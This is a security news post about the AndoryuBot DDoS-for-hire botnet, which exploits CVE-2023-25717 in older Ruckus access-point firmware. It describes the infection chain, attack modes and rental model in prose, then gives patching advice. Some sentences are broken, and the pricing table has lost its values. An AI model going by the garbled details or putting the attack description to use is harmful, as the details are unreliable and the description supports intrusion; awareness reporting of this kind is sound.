In February 2023, Fortinet reported and fixed a new vulnerability targeting devices with unpatched firmware versions and recruiting such devices in a DDoS botnet. Later (mid April), Ruckus Wireless Access Points was discovered to be one of the main targets of the because of an RCE flaw. A critical-severity vulnerability was announced and tracked as CVE-2023-25717. Dubbed "AndoryuBot project". The DDoS botnet was later discovered that to be available as a service to cybercriminals by its operators.
AndoryuBot - Ruckus Attack technique:
You should pay attention if you are a Ruckus Wireless solutions user/admin because you will need to check your firmware version to be on the safe side. As mentioned by bleepingcomputer, the RCE flaw only works on all Ruckus Access Points with firmware version 10.4 or earlier. In which case, the attacker would send an unauthenticated HTTP GET request, to download a malicious script from a hard-coded URL and communicates with a C2 server, giving the operator control over the compromised device.
The targeting is quite broad and works on a number of system architectures including x86, arm, spc, m68k, mips, sh4 and mpsl. It is worth noting here that after the infection, the malicious script communicates with the C2 server using a SOCKS proxying protocol to stay stealth and avert firewalls on the way.
About the AndoryuBot Project:
Cybercrime as a Service is nothing new, AndoryuBot project's news probably made it to you because the operators are not very quiet about it and it has targeted once of the most widely-used access points globally especially in hospitality venues and campuses. The project offers a DDoS botnet on-demand for cybercriminals with a specified attack list, all the operator needs is a target IP, a port number and they are ready to set their attack in motion.
The malware is capable of all 12 types of DDoS attack modes: tcp-raw, tcp-socket, tcp-cnc, tcp-handshake, udp-plain, udp-game, udp-ovh, udp-raw, udp-vse, udp-dstat, udp-bypass, and icmp-echo. So once the services are rented to a cybercriminal, the operators of AndoryuBot set the attack type, target IP and port number to launch the attack on the victim and receive their compensation in a cryptocurrency (XMR, BTC, ETH, USDT, CashApp) for the service.
Rental Fees for AndoryuBot DDoS botnet:
It is darkly comic that the project operators offer 2 bundles for the DDoS attack service. Here are the available rental packages!
Type of connection
How many bots?
50x / day
100x / day
How to stay protected (If you're a Ruckus user):
Upgrade the firmware to later than 10.4
Use a strong device admin password
Disable remote admin panel if not needed
Links and Sources: